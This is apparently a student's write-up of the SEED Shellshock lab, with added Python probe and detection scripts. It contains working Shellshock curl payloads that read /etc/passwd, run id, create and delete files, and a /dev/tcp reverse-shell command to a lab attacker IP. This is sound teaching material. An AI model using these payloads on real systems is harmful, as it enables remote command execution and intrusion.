SEED 2.0 Softwarelab2:Shellshock Attack Lab

Shellshock Attack Lab

Overview

The Shellshock vulnerability affects many systems; an attack can be launched remotely or from the local machine.

This lab covers the following topics:

  • Shellshock
  • Environment variables
  • Function definitions in bash
  • Apache and CGI programs

Environment Setup

DNS setting


Container Setup and Commands

Start the Docker containers (using the SEED lab's shell aliases):

  1. labsetup
  2. dcbuild (docker-compose build)
  3. dcup (docker-compose up)
  4. dockps, docksh (list the running containers, open a shell inside one)

Web Server and CGI

Access the CGI program on the server: curl http://www.seedlab-shellshock.com/cgi-bin/vul.cgi


Lab Tasks

Task 1: Experimenting with Bash Function

Use the following commands to check whether the shell has the Shellshock vulnerability:

# the value looks like a function definition, followed by an extra command
foo="() { echo "hello"; }; echo "extra";"
export foo
# now start the bash binary under test: a vulnerable bash prints "extra"
# while importing the environment, a patched one does not

  1. Vulnerable version (prints "extra")
  2. Non-vulnerable version (nothing printed)

The commands above can be used to determine whether a shell is affected by Shellshock.
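As an added example (not part of the original write-up or of the SEED lab materials), the Python script below automates the Task 1 check: it runs a bash binary of your choice with an environment variable whose value is a function definition followed by an extra command, and reports whether the extra command ran. It also checks the opposite property, that the child bash still sees the whole value as an ordinary string. The helper names and the marker string are this example's own; which bash binary to test (the lab installs its unpatched copy under a separate name) is passed in by the caller.

```python
"""Automated version of the Task 1 check: does this bash import code from
environment variables?

Added example for this write-up (not the page's or the SEED lab's code).
Helper names and the marker string are this example's own choices.
"""
import os
import shutil
import subprocess

# What a vulnerable bash prints: the echo sits *after* the function body, so it
# only runs if bash executes the rest of the value while importing the variable.
MARKER = "marker-from-env-import"
PAYLOAD = "() { :; }; echo " + MARKER


def find_bash():
    """Locate a bash binary on PATH, or None if there is none."""
    return shutil.which("bash")


def _run(bash_path, script):
    """Run `bash_path -c script` with the probe variable exported; None on failure."""
    if not (os.path.isfile(bash_path) and os.access(bash_path, os.X_OK)):
        return None
    env = dict(os.environ)
    env["foo"] = PAYLOAD          # same variable name as the manual test
    try:
        return subprocess.run(
            [bash_path, "-c", script],
            env=env, capture_output=True, text=True, timeout=10, check=False,
        )
    except (OSError, subprocess.SubprocessError):
        return None


def shellshock_probe(bash_path):
    """True if the trailing command in the variable ran (vulnerable bash),
    False if it did not (patched bash), None if bash could not be executed."""
    result = _run(bash_path, ":")
    if result is None:
        return None
    return MARKER in result.stdout


def env_value_kept_as_data(bash_path):
    """True if the child bash sees $foo as an ordinary string with the whole
    value intact, i.e. it did not turn the variable into a function."""
    result = _run(bash_path, 'printf "%s" "$foo"')
    if result is None:
        return None
    return result.stdout == PAYLOAD


if __name__ == "__main__":
    bash = find_bash() or "/bin/bash"
    print(bash, "imports trailing code:", shellshock_probe(bash))
    print(bash, "keeps the value as data:", env_value_kept_as_data(bash))
```

Run it once against the patched bash and once against the unpatched copy: the two functions return opposite values for the two binaries, which is exactly the difference the two screenshots in Task 1 show.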

Task 2: Passing Data to Bash via Environment Variable


Use the different options of curl to access this CGI program and investigate how an attacker passes data to the vulnerable bash through environment variables. In the output of getenv.cgi the three values show up as the HTTP_USER_AGENT, HTTP_REFERER and HTTP_AAAAAA environment variables.

curl -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi                       # -v prints the request and response details
curl -A "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi          # -A sets the User-Agent header
curl -e "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi          # -e sets the Referer header
curl -H "AAAAAA: BBBBBB" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi   # -H adds a custom header


Task 3: Launching the Shellshock Attack

Launch the Shellshock attack against the target CGI program using three different methods.

For the four targets below, each one uses a single method, and three different methods are covered in total.

Task 3.A: Get the server to send back the content of the /etc/passwd file

echo Content_type: text/plain; echo; /bin/cat /etc/passwd

Use the User-Agent field:

curl -A "() { echo hello;}; echo Content_type: text/plain; echo; /bin/cat /etc/passwd" www.seedlab-shellshock.com/cgi-bin/vul.cgi


Task 3.B: Get the server to tell you its process’ user ID. You can use the /bin/id command to print out the ID information

echo Content_type: text/plain; echo; /bin/id

Use the Referer field:

curl -e "() { echo hello;}; echo Content_type: text/plain; echo; /bin/id" www.seedlab-shellshock.com/cgi-bin/vul.cgi


Task 3.C: Get the server to create a file inside the /tmp folder. You need to get into the container to see whether the file is created or not, or use another Shellshock attack to list the /tmp folder

echo Content_type: text/plain; echo; touch /tmp/task; /bin/ls /tmp/

Use a self-defined header field (the same field is reused with /bin/rm for the deletion in Task 3.D):

curl -H "test:() { echo hello;}; echo Content_type: text/plain; echo; /bin/touch /tmp/task;" www.seedlab-shellshock.com/cgi-bin/vul.cgi


Task 3.D: Get the server to delete the file that you just created inside the /tmp folder.

echo Content_type: text/plain; echo; rm -rf /tmp/task

curl -H "test:() { echo hello;}; echo Content_type: text/plain; echo; /bin/rm -rf /tmp/task" www.seedlab-shellshock.com/cgi-bin/vul.cgi


Question

  1. Can the content of /etc/shadow be read through this vulnerability?
    No. From Task 3.B we know that we only have the privileges of the www-data user, and reading /etc/shadow requires root privileges.
  2. Can the Shellshock attack be carried out through the GET method, via the QUERY_STRING environment variable?
    curl "www.seedlab-shellshock.com/cgi-bin/vul.cgi/?() { echo hello;}; echo Content_type: text/plain; echo; /bin/cat /etc/passwd"
    I think not, because the parameters after the ? in a GET request cannot be parsed.
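To make the header-to-environment mapping observed in Task 2, the three header channels used in Task 3 and the QUERY_STRING variable from question 2 concrete from the defender's side, here is an added Python example (not the page's or the SEED lab's code). It rebuilds the part of the CGI interface that getenv.cgi lets you observe: each header name is upper-cased, '-' becomes '_' and the name is prefixed with HTTP_, while the query part of the URL is copied unchanged into QUERY_STRING. It then flags every variable whose value starts with the function-definition prefix that a pre-patch bash imported, which is the check a log scanner or request filter applies. The sample requests are constructed, and the function names are this example's own.

```python
"""How Apache turns request headers into CGI environment variables, and a
scanner that flags values a pre-patch bash would have imported as functions.

Added example for this write-up (not the page's or the SEED lab's code).
The request samples are constructed; function names are this example's own.
"""
import re

# Pre-patch bash treated any environment variable whose value began with "() {"
# as a function definition and, as a side effect, executed whatever followed the
# closing brace. Allowing extra whitespace makes the check slightly broader
# than bash's own literal "() {" comparison, which is the safe direction.
FUNCTION_IMPORT = re.compile(r"^\s*\(\s*\)\s*\{")


def parse_request(raw):
    """Split a minimal HTTP/1.x request into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if line:
            name, _, value = line.partition(":")   # split only at the first colon
            headers[name.strip()] = value.strip()
    return method, path, headers


def cgi_env_from_request(method, path, headers):
    """Subset of the CGI (RFC 3875) environment the web server hands to vul.cgi."""
    script, _, query = path.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": script,
        "QUERY_STRING": query,       # passed through without URL-decoding
    }
    for name, value in headers.items():
        # User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER, test -> HTTP_TEST
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def shellshock_indicators(env):
    """Names of the variables whose values look like a function import."""
    return sorted(name for name, value in env.items() if FUNCTION_IMPORT.match(value))


def scan_request(raw):
    """Parse a raw request and return the suspicious CGI variable names."""
    method, path, headers = parse_request(raw)
    return shellshock_indicators(cgi_env_from_request(method, path, headers))


# Constructed sample: what the Task 3.B `curl -e ...` command puts on the wire.
PROBE_REQUEST = (
    "GET /cgi-bin/vul.cgi HTTP/1.1\r\n"
    "Host: www.seedlab-shellshock.com\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "Referer: () { echo hello;}; echo Content_type: text/plain; echo; /bin/id\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Constructed sample: an ordinary request, including the custom header from Task 2.
BENIGN_REQUEST = (
    "GET /cgi-bin/getenv.cgi?name=seed HTTP/1.1\r\n"
    "Host: www.seedlab-shellshock.com\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "AAAAAA: BBBBBB\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("probe", PROBE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", scan_request(raw) or "clean")
```

The mapping is why -A, -e and -H all reach the CGI process the same way: every header becomes an HTTP_* variable in the environment of the bash that runs vul.cgi, so the variable name is irrelevant and only the value prefix matters. QUERY_STRING is handed over without URL-decoding, so the scanner looks at the query text exactly as bash would see it.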

Task 4: Getting a Reverse Shell via Shellshock Attack

Create a reverse shell so that arbitrary commands can be run conveniently.

  1. Start a listener on port 9090 on the attacker machine
  2. Launch the Shellshock attack
    curl -A "() { echo hello;}; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.37.132/9090 0<&1 2>&1" http://10.9.0.80/cgi-bin/vul.cgi
  3. The reverse shell connects successfully

Task 5: Using the Patched Bash

Redo Task 3 with the patched bash: change the CGI program to use /bin/bash.

Attacking again only produces the program's normal "hello world" output.

  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
  • Copyrights © 2021 Sung